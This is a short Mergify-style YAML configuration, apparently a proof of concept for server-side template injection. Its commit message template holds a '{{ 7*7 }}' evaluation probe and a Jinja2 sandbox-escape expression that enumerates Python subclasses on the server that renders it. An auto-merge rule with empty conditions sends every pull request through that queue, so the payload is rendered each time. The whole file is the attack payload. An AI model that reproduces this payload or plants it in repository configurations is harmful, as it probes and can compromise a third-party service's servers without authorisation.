queue_rules:
  - name: ssti-queue
    commit_message_template: "7*7={{ 7*7 }} / user={{ ''.__class__.__mro__[1].__subclasses__() }}"

pull_request_rules:
  - name: auto-merge
    conditions: []
    actions:
      queue:
        name: ssti-queue
